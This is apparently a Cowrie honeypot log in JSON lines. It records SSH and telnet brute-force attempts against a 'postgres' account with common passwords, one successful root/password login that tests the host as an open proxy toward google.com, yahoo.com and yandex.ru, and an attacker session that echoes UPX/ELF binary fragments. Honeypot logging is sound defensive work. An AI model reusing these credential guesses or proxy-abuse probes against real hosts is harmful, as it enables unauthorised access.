{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T18:33:50.254842Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T18:33:50.259590Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T18:33:50.263494Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/15013d2c4c53ba1bc29c39377f1fb65dd71a8fc3b5e04a0ba4306b31a8e53df6","size":1936,"shasum":"15013d2c4c53ba1bc29c39377f1fb65dd71a8fc3b5e04a0ba4306b31a8e53df6","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/15013d2c4c53ba1bc29c39377f1fb65dd71a8fc3b5e04a0ba4306b31a8e53df6 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:33:50.265140Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:33:50.266463Z","src_ip":"8.138.136.155","session":"a884db8d4655"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":59940,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bf91555d8ae","protocol":"ssh","message":"New connection: 170.64.157.139:59940 (1.2.3.4:22) [session: 9bf91555d8ae]","sensor":"my-vps","timestamp":"2025-09-08T18:34:11.691724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:34:11.692633Z","src_ip":"170.64.157.139","session":"9bf91555d8ae"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:34:11.989482Z","src_ip":"170.64.157.139","session":"9bf91555d8ae"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123qwe","message":"login attempt [postgres/123qwe] failed","sensor":"my-vps","timestamp":"2025-09-08T18:34:12.883228Z","src_ip":"170.64.157.139","session":"9bf91555d8ae"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:34:14.183852Z","src_ip":"170.64.157.139","session":"9bf91555d8ae"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":36894,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b169e8a51ea","protocol":"ssh","message":"New connection: 170.64.157.139:36894 (1.2.3.4:22) [session: 6b169e8a51ea]","sensor":"my-vps","timestamp":"2025-09-08T18:35:25.796360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:35:25.797158Z","src_ip":"170.64.157.139","session":"6b169e8a51ea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:35:26.137784Z","src_ip":"170.64.157.139","session":"6b169e8a51ea"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"passpass","message":"login attempt [postgres/passpass] failed","sensor":"my-vps","timestamp":"2025-09-08T18:35:27.176439Z","src_ip":"170.64.157.139","session":"6b169e8a51ea"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:35:28.519379Z","src_ip":"170.64.157.139","session":"6b169e8a51ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:36:02.079721Z","src_ip":"212.227.125.160","session":"5e6899c13dd4"}
{"eventid":"cowrie.session.closed","duration":180.16706132888794,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:36:02.084852Z","src_ip":"212.227.125.160","session":"5e6899c13dd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39736,"dst_ip":"1.2.3.4","dst_port":23,"session":"c574e04d087c","protocol":"telnet","message":"New connection: 212.227.235.229:39736 (1.2.3.4:23) [session: c574e04d087c]","sensor":"my-vps","timestamp":"2025-09-08T18:36:02.822951Z"}
{"eventid":"cowrie.session.closed","duration":12.818361520767212,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:36:15.641234Z","src_ip":"212.227.235.229","session":"c574e04d087c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63100,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bf9adaffb88","protocol":"ssh","message":"New connection: 217.72.205.35:63100 (1.2.3.4:22) [session: 4bf9adaffb88]","sensor":"my-vps","timestamp":"2025-09-08T18:36:40.250987Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:36:40.252314Z","src_ip":"217.72.205.35","session":"4bf9adaffb88"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":40468,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3aeec227fc5","protocol":"ssh","message":"New connection: 170.64.157.139:40468 (1.2.3.4:22) [session: b3aeec227fc5]","sensor":"my-vps","timestamp":"2025-09-08T18:36:42.861103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:36:42.862019Z","src_ip":"170.64.157.139","session":"b3aeec227fc5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:36:43.156628Z","src_ip":"170.64.157.139","session":"b3aeec227fc5"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"pass123","message":"login attempt [postgres/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:36:44.059702Z","src_ip":"170.64.157.139","session":"b3aeec227fc5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:36:45.356696Z","src_ip":"170.64.157.139","session":"b3aeec227fc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50789,"dst_ip":"1.2.3.4","dst_port":23,"session":"aeca5a672b8e","protocol":"telnet","message":"New connection: 212.227.235.229:50789 (1.2.3.4:23) [session: aeca5a672b8e]","sensor":"my-vps","timestamp":"2025-09-08T18:36:59.512687Z"}
{"eventid":"cowrie.session.closed","duration":13.479289531707764,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:37:12.991910Z","src_ip":"212.227.235.229","session":"aeca5a672b8e"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":57524,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c25eca809b2","protocol":"ssh","message":"New connection: 170.64.157.139:57524 (1.2.3.4:22) [session: 1c25eca809b2]","sensor":"my-vps","timestamp":"2025-09-08T18:37:57.556230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:37:57.558180Z","src_ip":"170.64.157.139","session":"1c25eca809b2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:37:57.891280Z","src_ip":"170.64.157.139","session":"1c25eca809b2"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"pass1234","message":"login attempt [postgres/pass1234] failed","sensor":"my-vps","timestamp":"2025-09-08T18:37:59.230732Z","src_ip":"170.64.157.139","session":"1c25eca809b2"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:38:00.567636Z","src_ip":"170.64.157.139","session":"1c25eca809b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e434003b410","protocol":"ssh","message":"New connection: 212.227.235.229:64001 (1.2.3.4:22) [session: 0e434003b410]","sensor":"my-vps","timestamp":"2025-09-08T18:38:30.195523Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:38:30.296573Z","src_ip":"212.227.235.229","session":"0e434003b410"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":52506,"dst_ip":"1.2.3.4","dst_port":22,"session":"94b0b999ebbf","protocol":"ssh","message":"New connection: 170.64.157.139:52506 (1.2.3.4:22) [session: 94b0b999ebbf]","sensor":"my-vps","timestamp":"2025-09-08T18:39:10.670621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:39:10.719425Z","src_ip":"170.64.157.139","session":"94b0b999ebbf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:39:10.998533Z","src_ip":"170.64.157.139","session":"94b0b999ebbf"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"wasd","message":"login attempt [postgres/wasd] failed","sensor":"my-vps","timestamp":"2025-09-08T18:39:12.307284Z","src_ip":"170.64.157.139","session":"94b0b999ebbf"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:39:13.651758Z","src_ip":"170.64.157.139","session":"94b0b999ebbf"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":34371,"dst_ip":"1.2.3.4","dst_port":22,"session":"63617e026edf","protocol":"ssh","message":"New connection: 185.246.128.133:34371 (1.2.3.4:22) [session: 63617e026edf]","sensor":"my-vps","timestamp":"2025-09-08T18:40:01.030914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_1.7.7.1","message":"Remote SSH version: SSH-2.0-paramiko_1.7.7.1","sensor":"my-vps","timestamp":"2025-09-08T18:40:01.033599Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-09-08T18:40:01.078516Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.094711Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":27374,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:27374","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.140784Z","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.185791Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":19179,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:19179","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.331140Z","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.377398Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"185.246.128.133","src_port":6161,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:6161","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.511744Z","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.559636Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"185.246.128.133","src_port":14897,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14897","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.694953Z","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.741426Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"185.246.128.133","src_port":28625,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28625","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.874802Z","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T18:40:02.921230Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"185.246.128.133","src_port":25980,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25980","sensor":"my-vps","timestamp":"2025-09-08T18:40:03.059160Z","session":"63617e026edf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T18:40:03.104606Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:40:03.150495Z","src_ip":"185.246.128.133","session":"63617e026edf"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":51622,"dst_ip":"1.2.3.4","dst_port":22,"session":"d620af4fe70f","protocol":"ssh","message":"New connection: 170.64.157.139:51622 (1.2.3.4:22) [session: d620af4fe70f]","sensor":"my-vps","timestamp":"2025-09-08T18:40:25.135307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:40:25.180750Z","src_ip":"170.64.157.139","session":"d620af4fe70f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:40:25.425952Z","src_ip":"170.64.157.139","session":"d620af4fe70f"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty","message":"login attempt [postgres/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T18:40:26.588919Z","src_ip":"170.64.157.139","session":"d620af4fe70f"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:40:27.894609Z","src_ip":"170.64.157.139","session":"d620af4fe70f"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":52502,"dst_ip":"1.2.3.4","dst_port":22,"session":"5058df35cda5","protocol":"ssh","message":"New connection: 170.64.157.139:52502 (1.2.3.4:22) [session: 5058df35cda5]","sensor":"my-vps","timestamp":"2025-09-08T18:41:42.681945Z"}
